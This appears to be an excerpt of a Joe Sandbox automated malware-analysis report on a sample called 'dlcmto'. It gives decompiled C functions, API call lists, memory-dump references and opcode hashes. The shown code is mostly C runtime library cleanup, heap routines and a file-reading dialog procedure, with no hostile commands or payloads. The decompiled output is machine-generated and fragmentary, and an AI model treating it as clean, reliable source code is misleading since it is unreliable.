                                          0x01191ed5
                                          0x01191eda
                                          0x01191ee4
                                          0x01191ef2
                                          0x01191f05
                                          0x01191f0c
                                          0x01191f0c
                                          0x01191ef2
                                          0x01191ed5
                                          0x01191eb9
                                          0x01191e97
                                          0x00000000
                                          0x01191f14
                                          0x01191dd5
                                          0x01191ddf
                                          0x01191e0a
                                          0x01191e0d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 01191D5B
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: 0936122cc66b4f695daf665325b83bd5b840727ce540af0880b5430696379f33
                                          • Instruction ID: fdc13fd841eac98c5993124513812be6a656479bce5bad58379b3cb85f9041f5
                                          • Opcode Fuzzy Hash: 0936122cc66b4f695daf665325b83bd5b840727ce540af0880b5430696379f33
                                          • Instruction Fuzzy Hash: 3D516E71A002169BEF2DCF58D4C17AEBBF0FB54325F24842AD426EB254D3759A80CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119546E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119546E() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x11a9454 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                          0x0119546e
                                          0x01195476
                                          0x0119547e

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: HeapProcess
                                          • String ID:
                                          • API String ID: 54951025-0
                                          • Opcode ID: e0dd14c1e49cf09ef5e332a29d76ac6628cfae1b4b6c6e890a6c665d071ee447
                                          • Instruction ID: b330ea9571e425db12df33e8f96d4ccd502ad913a3542995107cb76a285978e0
                                          • Opcode Fuzzy Hash: e0dd14c1e49cf09ef5e332a29d76ac6628cfae1b4b6c6e890a6c665d071ee447
                                          • Instruction Fuzzy Hash: 15A02230302200CF83B88F38A30830C3FEEAA002C03808038A828CC008EBBCA8C88B00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F017B Relevance: .1, Instructions: 60COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                          • Instruction ID: e4222fbfd5ac9acd0ccb9ad8ebe359c4b14d3bcecdfbca2aaaf7de2430a2c190
                                          • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                                          • Instruction Fuzzy Hash: F2117036604119AFD720EF69C8849BAB7EDEF947A47048015FD55CB212E334ED81C764
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F013E Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                          • Instruction ID: d47af0028176d6a3ac38b800163ea7cd09b11caa9c7f35207590211e7e22cf83
                                          • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                                          • Instruction Fuzzy Hash: A6E01235764549EFDB54CBA8CD41D65B3FCEB49320B144690F925C73A1E634ED00D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F0109 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                          • Instruction ID: a2324a6b39098234d6a689ab2315a8264ff461bfe8a327575167f824ea7faefe
                                          • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                                          • Instruction Fuzzy Hash: F3E04F323146189BC7719B59C840DA6F7ECEBC87B0B594425EE4997612C230FC01C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01196ECB Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01196ECB(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E011951DC(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                                          0x01196ed8
                                          0x01196eda
                                          0x01196edd
                                          0x01196ee0
                                          0x01196ee3
                                          0x01196ef4
                                          0x01196ef6
                                          0x01196ee5
                                          0x01196ee9
                                          0x01196ef2
                                          0x00000000
                                          0x00000000
                                          0x01196ef2
                                          0x01196efb

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cc3036549b466a1c5fd9c8d616be3f93c80a39e821ead38e50a7295e246afb17
                                          • Instruction ID: ef27f164d210343f1b32ebd8cd9047e29c385f5c474f1a3167e6f934b493b4ad
                                          • Opcode Fuzzy Hash: cc3036549b466a1c5fd9c8d616be3f93c80a39e821ead38e50a7295e246afb17
                                          • Instruction Fuzzy Hash: 7DE08C72911278EBCF19DB8CC90498AF7ECEB45A04B1104A6BA21E3100C370DE00CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F005F Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                          • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                          • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                          • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197525 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197525(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x11a7908) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E011963FE(_t46);
							E01196EFC( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E011963FE(_t47);
							E01196FFA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E011963FE( *((intOrPtr*)(_t74 + 0x7c)));
						E011963FE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E011963FE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E011963FE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E011963FE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E011963FE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E011976BF( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x11a7850) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E011963FE(_t31);
							E011963FE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E011963FE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E011963FE(_t74);
			}















                                          0x0119752d
                                          0x01197531
                                          0x01197539
                                          0x01197542
                                          0x01197547
                                          0x0119754e
                                          0x01197556
                                          0x0119755e
                                          0x01197569
                                          0x0119756f
                                          0x01197570
                                          0x01197578
                                          0x01197580
                                          0x0119758b
                                          0x01197591
                                          0x01197595
                                          0x011975a0
                                          0x011975a6
                                          0x01197547
                                          0x011975a7
                                          0x011975af
                                          0x011975c2
                                          0x011975d5
                                          0x011975e3
                                          0x011975ee
                                          0x011975f3
                                          0x011975fc
                                          0x01197604
                                          0x01197605
                                          0x0119760b
                                          0x0119760e
                                          0x01197611
                                          0x01197618
                                          0x0119761a
                                          0x0119761e
                                          0x01197626
                                          0x0119762d
                                          0x01197633
                                          0x01197634
                                          0x01197634
                                          0x0119763b
                                          0x0119763d
                                          0x01197642
                                          0x0119764a
                                          0x0119764f
                                          0x01197650
                                          0x01197650
                                          0x01197653
                                          0x01197656
                                          0x01197659
                                          0x0119765c
                                          0x0119765c
                                          0x0119766c

                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 01197569
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F19
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F2B
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F3D
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F4F
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F61
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F73
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F85
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196F97
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FA9
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FBB
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FCD
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FDF
                                            • Part of subcall function 01196EFC: _free.LIBCMT ref: 01196FF1
                                          • _free.LIBCMT ref: 0119755E
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01197580
                                          • _free.LIBCMT ref: 01197595
                                          • _free.LIBCMT ref: 011975A0
                                          • _free.LIBCMT ref: 011975C2
                                          • _free.LIBCMT ref: 011975D5
                                          • _free.LIBCMT ref: 011975E3
                                          • _free.LIBCMT ref: 011975EE
                                          • _free.LIBCMT ref: 01197626
                                          • _free.LIBCMT ref: 0119762D
                                          • _free.LIBCMT ref: 0119764A
                                          • _free.LIBCMT ref: 01197662
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: d7fb27c112766d3dfb38cbf7fcb66324d7108dbf9ce210dacb464d1b23c779a2
                                          • Instruction ID: 1a2e1c229360bb3256409c6221dcd84aee511e82a464483776d273f43d7b8b4d
                                          • Opcode Fuzzy Hash: d7fb27c112766d3dfb38cbf7fcb66324d7108dbf9ce210dacb464d1b23c779a2
                                          • Instruction Fuzzy Hash: 5A318D31614306AFFF2DAB3CD944B5AB7E9EF04214F504829E0A9D71A0DF31EA90CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011910D6 Relevance: 15.1, APIs: 10, Instructions: 98windowfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E011910D6(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v532;
				void _v787;
				int _v796;
				intOrPtr _v800;
				struct HWND__* _t10;
				struct HWND__* _t12;
				void* _t14;
				long _t15;
				int _t18;
				int _t19;
				int _t20;
				long _t22;
				struct HWND__* _t24;
				intOrPtr _t26;
				long _t32;
				void* _t33;
				void* _t35;
				DWORD* _t36;

				_t26 = _a8;
				_t10 = _a4;
				if(_t26 == 0x4e) {
					if( *((intOrPtr*)(_a16 + 8)) != 0xfffffda6 ||  *0x11a881c == 0) {
						L14:
						return 0;
					} else {
						_t12 = GetParent(_t10);
						_t32 =  &_v532;
						SendMessageW(_t12, 0x465, 0, _t32);
						_t36 = _t35 - 0x1c;
						_v796 = 0;
						asm("movaps xmm0, [0x11a0120]");
						asm("movups [esp+0x4], xmm0");
						 *_t36 = _t32;
						_v800 = 0x80;
						_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??);
						if(_t14 == 0xffffffff) {
							goto L14;
						}
						_t33 = _t14;
						_t15 = GetFileSize(_t14, 0);
						if(_t15 == 0xffffffff) {
							CloseHandle(_t33);
							goto L14;
						}
						_t29 =  <  ? _t15 : 0xff;
						_t18 = ReadFile(_t33,  &_v787,  <  ? _t15 : 0xff, _t36, 0);
						_t19 = CloseHandle(_t33);
						if(_t18 == 0) {
							goto L14;
						}
						_t20 = E01191041(_t19,  &_v787,  *_t36);
						if(_t20 == 0xffffffff) {
							goto L14;
						}
						 *0x11a8818 = _t20;
						SendMessageW( *0x11a8cb4, 0x14e, _t20, 0);
						L4:
						goto L14;
					}
				}
				if(_t26 == 0x111) {
					if(_a12 == 0x10191) {
						_t22 = SendMessageW( *0x11a8cb4, 0x147, 0, 0);
						_t23 =  ==  ? 0 : _t22;
						 *0x11a8818 =  ==  ? 0 : _t22;
					}
					goto L14;
				}
				if(_t26 != 0x110) {
					goto L14;
				}
				_t24 = GetDlgItem(_t10, 0x191);
				 *0x11a8cb4 = _t24;
				SendMessageW(_t24, 0x14e,  *0x11a8818, 0);
				goto L4;
			}





















                                          0x011910df
                                          0x011910e6
                                          0x011910f0
                                          0x01191142
                                          0x01191230
                                          0x0119123b
                                          0x01191155
                                          0x01191156
                                          0x0119115c
                                          0x0119116d
                                          0x01191173
                                          0x01191176
                                          0x0119117a
                                          0x01191181
                                          0x01191186
                                          0x01191189
                                          0x01191191
                                          0x0119119a
                                          0x00000000
                                          0x00000000
                                          0x011911a0
                                          0x011911a5
                                          0x011911ae
                                          0x0119123f
                                          0x00000000
                                          0x0119123f
                                          0x011911bb
                                          0x011911ca
                                          0x011911d3
                                          0x011911db
                                          0x00000000
                                          0x00000000
                                          0x011911e1
                                          0x011911e9
                                          0x00000000
                                          0x00000000
                                          0x011911eb
                                          0x01191129
                                          0x01191129
                                          0x00000000
                                          0x01191129
                                          0x01191142
                                          0x011910f8
                                          0x0119120e
                                          0x0119121f
                                          0x01191228
                                          0x0119122b
                                          0x0119122b
                                          0x00000000
                                          0x0119120e
                                          0x01191104
                                          0x00000000
                                          0x00000000
                                          0x01191110
                                          0x01191116
                                          0x01191129
                                          0x00000000

                                          APIs
                                          • GetDlgItem.USER32 ref: 01191110
                                          • SendMessageW.USER32(0000014E,00000000,00000000), ref: 01191129
                                          • GetParent.USER32(?), ref: 01191156
                                          • SendMessageW.USER32(00000000,00000465,00000000,?), ref: 0119116D
                                          • CreateFileW.KERNEL32 ref: 01191191
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 011911A5
                                          • ReadFile.KERNEL32(00000000,?,000000FF,?,00000000), ref: 011911CA
                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 011911D3
                                          • SendMessageW.USER32(00000147,00000000,00000000), ref: 0119121F
                                          • CloseHandle.KERNEL32(00000000), ref: 0119123F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileMessageSend$CloseHandle$CreateItemParentReadSize
                                          • String ID:
                                          • API String ID: 2025491334-0
                                          • Opcode ID: db685b2d06e4334941cdb89d9dad91e3c6259e672471eb1ab47525b98f44c697
                                          • Instruction ID: 19c0867fd910fa77f0f3a4a18415d009c52038dfd450d5484e0e937da95f8577
                                          • Opcode Fuzzy Hash: db685b2d06e4334941cdb89d9dad91e3c6259e672471eb1ab47525b98f44c697
                                          • Instruction Fuzzy Hash: 4B3103B0205301BBEB3D5B789C4CBAE7EAAEB84721F600629F175C51D4CB7048C28BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011957E0 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E011957E0(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x11a0280;
				if(_t68 != 0x11a0280) {
					E011963FE(_t68);
					_t36 = _a4;
				}
				E011963FE( *((intOrPtr*)(_t36 + 0x3c)));
				E011963FE( *((intOrPtr*)(_a4 + 0x30)));
				E011963FE( *((intOrPtr*)(_a4 + 0x34)));
				E011963FE( *((intOrPtr*)(_a4 + 0x38)));
				E011963FE( *((intOrPtr*)(_a4 + 0x28)));
				E011963FE( *((intOrPtr*)(_a4 + 0x2c)));
				E011963FE( *((intOrPtr*)(_a4 + 0x40)));
				E011963FE( *((intOrPtr*)(_a4 + 0x44)));
				E011963FE( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E01195959(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E011959C4(_t67, _t72, _t73, _t77);
			}














                                          0x011957e0
                                          0x011957e0
                                          0x011957e0
                                          0x011957e5
                                          0x011957eb
                                          0x011957ed
                                          0x011957f3
                                          0x011957f6
                                          0x011957fb
                                          0x011957fe
                                          0x01195802
                                          0x0119580d
                                          0x01195818
                                          0x01195823
                                          0x0119582e
                                          0x01195839
                                          0x01195844
                                          0x0119584f
                                          0x0119585d
                                          0x01195868
                                          0x01195870
                                          0x01195871
                                          0x01195874
                                          0x0119587a
                                          0x0119587e
                                          0x01195882
                                          0x01195883
                                          0x0119588d
                                          0x01195893
                                          0x01195894
                                          0x01195897
                                          0x0119589d
                                          0x011958a1
                                          0x011958a5
                                          0x011958ac

                                          APIs
                                          • _free.LIBCMT ref: 011957F6
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01195802
                                          • _free.LIBCMT ref: 0119580D
                                          • _free.LIBCMT ref: 01195818
                                          • _free.LIBCMT ref: 01195823
                                          • _free.LIBCMT ref: 0119582E
                                          • _free.LIBCMT ref: 01195839
                                          • _free.LIBCMT ref: 01195844
                                          • _free.LIBCMT ref: 0119584F
                                          • _free.LIBCMT ref: 0119585D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 970f03ba3dcb809fadc95a144c04841f1d3ac56ee95f0f53b1daa6e91bc0978f
                                          • Instruction ID: 7f7174a3baefb788e39cc5bcb7477c63e6a9fcbd3938a0ee265fde9806b4b94d
                                          • Opcode Fuzzy Hash: 970f03ba3dcb809fadc95a144c04841f1d3ac56ee95f0f53b1daa6e91bc0978f
                                          • Instruction Fuzzy Hash: 2D21A576904109BFDF55EF98C880DDE7BB9EF18244F4041A6A6299B120EB31EB54CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01198820 Relevance: 12.2, APIs: 8, Instructions: 208COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E01198820(signed int __ebx, void* __edi, void* __esi, signed int _a4) {
				intOrPtr _v0;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t49;
				signed int _t52;
				signed int _t54;
				signed int _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				signed int _t68;
				signed int _t69;
				intOrPtr* _t76;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t96;
				signed int _t97;
				void* _t98;
				void* _t100;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				void* _t119;
				void* _t121;
				void* _t124;
				void* _t125;

				_t88 = __ebx;
				_t121 = _t119;
				_push(_t121);
				_t125 = _t124 - 0x10;
				_push(__esi);
				_t115 = _a4;
				_t128 = _t115;
				if(_t115 != 0) {
					_push(__ebx);
					_push(__edi);
					_t112 = _t115;
					_t49 = E0119BE30(_t115, 0x3d);
					_v24 = _t49;
					__eflags = _t49;
					if(__eflags == 0) {
						L39:
						 *((intOrPtr*)(E01196E3F(__eflags))) = 0x16;
						goto L40;
					} else {
						__eflags = _t49 - _t115;
						if(__eflags == 0) {
							goto L39;
						} else {
							_v9 =  *((intOrPtr*)(_t49 + 1));
							L44();
							_t88 = 0;
							__eflags =  *0x11a9190 - _t88; // 0xf21a38
							if(__eflags != 0) {
								L15:
								_t54 =  *0x11a9190; // 0xf21a38
								_v16 = _t54;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L40;
								} else {
									_t57 = E01198A83(_t115, _v24 - _t115);
									_v20 = _t57;
									_t96 = _v16;
									__eflags = _t57;
									if(_t57 < 0) {
										L25:
										__eflags = _v9 - _t88;
										if(_v9 == _t88) {
											goto L41;
										} else {
											_t58 =  ~_t57;
											_v20 = _t58;
											_t30 = _t58 + 2; // 0x2
											_t110 = _t30;
											__eflags = _t110 - _t58;
											if(_t110 < _t58) {
												goto L40;
											} else {
												__eflags = _t110 - 0x3fffffff;
												if(_t110 >= 0x3fffffff) {
													goto L40;
												} else {
													_v16 = E0119864B(_t96, _t110, 4);
													E011963FE(_t88);
													_t61 = _v16;
													_t125 = _t125 + 0x10;
													__eflags = _t61;
													if(_t61 == 0) {
														goto L40;
													} else {
														_t97 = _v20;
														_t112 = _t88;
														 *(_t61 + _t97 * 4) = _t115;
														 *(_t61 + 4 + _t97 * 4) = _t88;
														goto L30;
													}
												}
											}
										}
									} else {
										__eflags =  *_t96 - _t88;
										if( *_t96 == _t88) {
											goto L25;
										} else {
											E011963FE( *((intOrPtr*)(_t96 + _t57 * 4)));
											_t109 = _v20;
											__eflags = _v9 - _t88;
											if(_v9 != _t88) {
												_t112 = _t88;
												 *(_v16 + _t109 * 4) = _t115;
											} else {
												_t110 = _v16;
												while(1) {
													__eflags =  *((intOrPtr*)(_t110 + _t109 * 4)) - _t88;
													if( *((intOrPtr*)(_t110 + _t109 * 4)) == _t88) {
														break;
													}
													 *((intOrPtr*)(_t110 + _t109 * 4)) =  *((intOrPtr*)(_t110 + 4 + _t109 * 4));
													_t109 = _t109 + 1;
													__eflags = _t109;
												}
												_v20 = E0119864B(_t110, _t109, 4);
